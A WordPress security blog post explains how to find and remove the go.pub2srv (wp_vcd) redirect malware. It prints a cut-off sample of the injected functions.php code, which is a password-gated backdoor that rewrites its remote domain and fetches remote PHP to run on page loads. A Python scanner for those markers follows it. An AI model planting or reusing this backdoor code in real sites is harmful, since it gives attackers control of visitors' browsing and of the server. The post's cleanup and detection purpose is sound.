Is your WordPress website infected with JavaScript malware? This ad malware randomly redirects the site/browser to an ad link or external website. The infection redirects your website visitors to malicious domains such as go.pub2srv[.]com, go.mobisla[.]com and go.oclaserver[.]com.
Here I've provided you with a tutorial on what this malware is all about, what causes this and how to fix this. So stay cool, grab a cup of coffee and continue reading...
Picture Credits: PC Malware Security
What is Go.pub2srv Malware?
It is malware that redirects visitors to spammy websites carrying advertisements, p*rn or phishing pages. On mobile devices it shows an Uber popup or similar popup messages.

What Causes this Go.pub2srv Malware?
In most cases this is caused by a hack; it also happens when you download themes or plugins from an unsafe website and install them on your site. So it is always advisable to scan themes and plugins downloaded from a third-party website (outside the wordpress.org directory) on VirusTotal before installing them.
What Are the Consequences of the Hack?
Since the main cause of this malware is an SQL injection (SQLi) vulnerability, an attacker can do the following:
- Add, delete, edit or read content in the database
- Read source code from files on the database server
- Write files to the database server
- Steal user records and passwords from your WordPress/OpenCart website
- Theft of transaction information in your OpenCart/WooCommerce stores
- Perform SEO spam on your domain, resulting in a Google Webmasters blacklist
How To Remove this Go.pub2srv Malware Code on WordPress?
Before learning how to remove this code, you should know where it is found in your WordPress files. The injected code is found in the following files:
- index.php
- functions.php
- Database tables

Follow these steps to remove it:
- Take a backup of your WordPress files (or zip the entire folder) so you can restore them if anything goes wrong.
- Change your passwords so the hacker no longer has access once you have carried out the steps below.
- Go to your themes directory and delete all unused themes.
- Remove all plugins downloaded from unknown sources.
- In your active theme, open/edit the functions.php file and remove the unfamiliar code from the beginning of the file. Below is a sample of the injected code.
```php
<?php
// Injected header found at the top of the theme's functions.php (sample is cut off in the original post).
// Block 1: password-gated remote control that lets the operator rewrite the domain the code fetches from.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f6efce15ddb7aa5764e90dffbfd5cfdc')) {
$div_code_name = "wp_vcd";
switch ($_REQUEST['action']) {
case 'change_domain';
if (isset($_REQUEST['newdomain'])) {
if (!empty($_REQUEST['newdomain'])) {
if ($file = @file_get_contents(__FILE__)) {
if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code5\.php/i', $file, $matcholddomain)) {
$file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
// Block 2: on every ordinary page load (not wp-cron.php or xmlrpc.php) fetch remote code and run it from a temp file.
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if (!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "
```
- After modifying the file, click Save.
- After that, replace the deleted files and folders with fresh copies from a newly downloaded WordPress package.
- In the wp-includes directory, delete the wp-vcd.php, class.wp.php and wp-tmp.php files.
- In the wp-includes directory, open post.php and delete the first PHP tag added by the malware.
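Checking for the indicators described above by hand is error-prone, so here is an added example (not code from the original post) that scans a WordPress tree for the markers of the injected functions.php code and for the dropped files named in the steps. The marker strings (wp_vcd, theme_temp_setup, file_get_contents_tcurl, code5.php) and file names come from this post; the sample site the script builds is constructed and inert.

```python
import re
import tempfile
from pathlib import Path

# Strings taken from the injected functions.php sample shown above.
CODE_MARKERS = [
    ("wp_vcd marker", re.compile(rb'\$div_code_name\s*=\s*"wp_vcd"')),
    ("theme_temp_setup()", re.compile(rb"function\s+theme_temp_setup\s*\(")),
    ("file_get_contents_tcurl()", re.compile(rb"function\s+file_get_contents_tcurl\s*\(")),
    ("code5.php callback", re.compile(rb"code5\.php")),
]
# Files the post says the malware drops into wp-includes/.
DROPPED_FILES = {"wp-vcd.php", "class.wp.php", "wp-tmp.php"}

def scan_wordpress(root):
    """Return sorted (relative_path, reason) pairs for every suspicious .php file."""
    root = Path(root)
    findings = []
    for path in root.rglob("*.php"):
        rel = path.relative_to(root).as_posix()
        if path.parent.name == "wp-includes" and path.name in DROPPED_FILES:
            findings.append((rel, "dropped file in wp-includes"))
        data = path.read_bytes()
        for name, pattern in CODE_MARKERS:
            if pattern.search(data):
                findings.append((rel, "injected code marker: " + name))
                break  # one reason per file is enough for the report
    return sorted(findings)

def build_sample_site(base):
    """Constructed sample tree: an infected theme file, a dropped file, a clean core file."""
    theme = Path(base) / "wp-content" / "themes" / "demo"
    inc = Path(base) / "wp-includes"
    theme.mkdir(parents=True)
    inc.mkdir()
    # Inert imitation of the injected header (constructed; no remote fetch, no eval).
    (theme / "functions.php").write_text(
        '<?php\n$div_code_name = "wp_vcd";\n'
        "if (!function_exists('theme_temp_setup')) {\n"
        "    function theme_temp_setup($phpCode) { return $phpCode; }\n}\n"
    )
    (inc / "wp-vcd.php").write_text("<?php // dropped file (constructed)\n")
    (inc / "post.php").write_text("<?php // clean core file (constructed)\n")

def scan_sample_site():
    """Build the constructed site in a temporary directory, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        return scan_wordpress(tmp)
```

Point `scan_wordpress()` at the real document root to get a list of files to inspect; a clean install returns an empty list.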
FAQ
- If I delete class.wp.php, WordPress crashes.
- What exactly is deleted in post.php? I couldn't find any difference compared to an original post.php file.
Useful Links & Credits
Resources:
- https://www.getastra.com/blog/911/how-to-remove-pub2srv-malware-from-your-wordpress-opencart-website/
- https://toster.ru/q/482218
- https://pastebin.com/bzcCHnT3
- https://wordpress.org/support/topic/mwjsgen2rogueads-unwanted_ads-1-2/
- https://www.upwork.com/job/prevent-SQL-injection-PHP-hardening-wordpress-stop-website-hacks_~013dcf70c6f4637ad3/
- https://fixmywp.com/blog/detect-clean-wordpress-malware-redirect.php
- https://stackoverflow.com/questions/46219263/php-code-in-functions-php-of-all-wordpress-websites-on-my-shared-hosting
Thanks, and Stay Safe!